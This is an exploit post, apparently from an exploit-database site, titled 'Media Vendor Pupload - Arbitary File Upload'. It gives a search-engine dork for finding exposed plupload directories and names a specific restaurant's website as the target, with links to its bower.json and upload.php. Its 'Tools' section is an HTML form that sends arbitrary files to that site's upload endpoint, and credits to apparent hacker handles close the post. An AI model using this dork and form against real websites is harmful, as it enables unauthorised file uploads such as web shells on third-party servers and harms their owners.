facebook facebook twitter rss

Media Vendor Pupload - Arbitary File Upload

Author: Rednofozi , Published: 27-08-2018
########################################## 
# Exploit Title : Media Vendor Pupload - Arbitary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:com
# Date : 2018
# Exploit Author: Rednofozi
# Category: Webapps
# Language: PHP
# Tested on: windows 10 / FireFox


Info : ______________________________________________________________________

#view : https://www.kemosabesushi.com/files/wp-includes/js/plupload/bower.json
#Test Upload :https://www.kemosabesushi.com/files/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php

vendor Source :

{
"name": "plupload",
"license": "AGPLv3",
"authors": [
"Davit Barbakadze <davit.barbakadze@ephox.com>"
],
"homepage": "http://plupload.com",
"repository": {
"type": "git",
"url": "https://github.com/moxiecode/plupload.git"
},
"main": [
"./js/plupload.full.min.js"
],
"ignore": [
"tests/",
"src/",
"build/",
"examples/",
"Jakefile.js",
"package.json",
"bower.json",
"composer.json",
"README.md",
".*"
]
}
______________________________________________________________________
#Tools :

<!DOCTYPE html>
<html>
<body>

<form action="https://www.kemosabesushi.com/files/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data">

<input type="file" name="file" id="file">
<input type="submit" value="Upload" name="submit">
</form>

</body>
</html>
______________________________________________________________________

# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow





Like us on Facebook :